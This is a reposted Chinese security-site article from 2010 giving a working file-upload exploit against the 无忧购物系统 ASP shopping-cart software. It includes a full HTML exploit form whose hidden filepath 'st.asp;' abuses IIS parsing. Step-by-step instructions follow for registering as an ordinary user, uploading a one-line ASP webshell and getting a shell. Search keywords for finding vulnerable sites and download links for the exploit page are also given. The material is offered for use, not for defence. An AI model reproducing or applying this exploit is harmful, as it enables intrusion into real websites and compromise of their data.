首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
无忧购物系统ASP时尚版和通用版上传漏洞利用
来源:http://hi.baidu.com/5427518/blog 作者:qing 发布时间:2010-10-01  

关键字:Copyright © 2008-2009 gzwynet.com.cn

上传利用地址:admin/upLoad_c.asp?a=uploadfile&b=1

利用文件:

<html>
<head>
<title>无忧购物系统ASP时尚版上传漏洞利用程序 BY Qing</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>


<form name="form1" method="post" action="http://www.hackqing.cn/admin/upLoad_c1.asp"

enctype="multipart/form-data" >
<div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
    <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR><td width=20%></td>
<TD bgcolor=#104A7B width="60%">
<TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
<TR>
           <td bgcolor=#eeeeee align=center><font color=red>正在上传文件,请稍候...</font></td>
</tr>
</table>
</td><td width=20%></td>
</tr>
    </table>
</div>
<table width="400" border="0" align="center" cellpadding="0" cellspacing="1"

bordercolorlight="#cccccc" bordercolordark="#CCCCCC" bgcolor="#CCCCCC">
    <tr bgcolor="#CCCCCC">
      <td height="22" align="left" valign="middle" bgcolor="f1f1f1" width="400">&nbsp;文件上传 (允许上

传的文件类型: jpg gif)
        <input type="hidden" name="filepath" value="uploadfile/st.asp;">
        <input type="hidden" name="filelx" value="1">
        <input type="hidden" name="EditName" value="">
        <input type="hidden" name="FormName" value="">
        <input type="hidden" name="act" value="uploadfile">
      </td>
    </tr>
    <tr align="center" valign="middle">
      <td width="400" height="80" align="left" bgcolor="#FFFFFF" id="upid"> 选择文件:
        <input type="file" name="file1" style="width:300'" class="tx1" value="">
      </td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
      <td bgcolor="#eeeeee" height="24" width="400">
        <input type="submit" name="Submit" value="· 开始上传 ·" class="button"

onclick="javascript:mysub()">
      </td>
    </tr>
</table>
</form>
</body>
</html>

上传一个JPG格式的小马或一句话

上传后的默认地址:admin/uploadfile/st.asp;(文件名)

如图

大小: 11.15 K尺寸: 500 x 173浏览: 0 次点击打开新窗口浏览全图

实际一句话地址:

大小: 9.61 K尺寸: 397 x 50浏览: 0 次点击打开新窗口浏览全图

利用文件:

无忧购物系统asp时尚版上传漏洞利用程序.html

http://down.qiannao.com/space/file/yulegu/share/2010/10/1/-65e0-5fe7-8d2d-7269-7cfb-7edfasp-65f6-5c1a-7248-4e0a-4f20-6f0f-6d1e-5229-7528-7a0b-5e8f.html/.page

 

版本:无忧购物系统ASP通用版 V2010.9.17

漏洞:上传漏洞

关键字:Copyright © 2000-2010 gzwynet.com.cn (若有其他更好的关键字,希望能给我留下言)

利用前提:注册用户

漏洞文件:upfile_Other.asp

其中:

<%
if EnableUploadFile="NO" then
response.write "系统未开放文件上传功能"
else
if session("AdminName")="" and session("UserName")="" then
   response.Write("请登录后再使用本功能!")

else
   select case upload_type
    case 0
     call upload_0() '使用化境无组件上传类
    case else
     'response.write "本系统未开放插件功能"
     'response.end
   end select
end if
end if
%>

user,就是注册用户,也存在上传权限,其他的几个文件,如Upfile_Dialog.asp,Upfile_Photo.asp并没有普通用户的上传权限

那么我们现在就是要利用普通用户的这个可以上传的功能。

首先,注册个用户,如果没找到注册的地方,直接在网址后面输入userreg.asp,

注册并登录,

大小: 87.76 K尺寸: 500 x 375浏览: 1 次点击打开新窗口浏览全图

登录之后不要关闭页面,因为是session验证,现在我们打开这个本地上传页面,

修改action后的地址,并给马儿后面添加一个空格,点击上传就可以,图中红色所示部分就是空格,如图所示

大小: 39.84 K尺寸: 500 x 99浏览: 3 次点击打开新窗口浏览全图大小: 42.28 K尺寸: 500 x 272浏览: 3 次点击打开新窗口浏览全图

复制页面上所示的木马地址,打开即可。

到此,拿到shell,完整结束。

 

附上本地上传的这个页面

http://down.qiannao.com/space/file/yulegu/share/2010/10/1/-672c-5730-4e0a-4f20-6f0f-6d1e.html/.page

 

首发流浪的风,由情整理编辑


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·ewebeditor高版本>=5.5鸡肋0day
·PhpYun人才系统通杀注入及代码执
·Phpwind 注入以及利用之二:文件
·shopxp html版2.0管理员添加漏洞
·phpcms2008本地文件包括及利用(
·N点虚拟主机管理系统 致命漏洞。
·慧博商城系统V6.0注入漏洞
·万博网站管理系统(NWEB)通杀漏洞
·酷我音乐盒存在DLL劫持漏洞(mfc
·dede的又一个代码执行
·老Y文章管理系统 v2.5 sp2 SQL注
·Discuz非创始人管理员代码执行
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved